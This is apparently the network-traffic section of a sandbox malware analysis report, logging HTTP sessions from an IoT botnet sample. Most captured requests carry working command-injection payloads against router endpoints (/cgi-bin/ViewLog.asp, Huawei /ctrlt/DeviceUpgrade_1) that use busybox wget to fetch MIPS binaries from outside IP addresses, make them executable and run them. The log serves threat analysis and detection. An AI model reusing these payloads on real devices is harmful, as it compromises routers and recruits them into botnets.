                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.082110882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.689830065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.649468899 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.592767000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              496192.168.2.143466094.102.135.698080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.442099094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              497192.168.2.145434494.182.157.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.488092899 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.763322115 CET212INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain
                                              Date: Thu, 23 Nov 2023 04:17:46 GMT
                                              Content-Length: 18
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              498192.168.2.1444514156.235.96.4437215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.506350994 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:50.594016075 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:56.737765074 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:08.769257069 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              499192.168.2.144709231.136.136.1898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.783396959 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.826066017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.969794035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.001312017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              500192.168.2.145946062.152.60.358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.798700094 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.003979921 CET556INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Thu, 23 Nov 2023 04:17:45 GMT
                                              Connection: close
                                              Content-Length: 311
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              501192.168.2.143301294.187.116.28080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.812834024 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
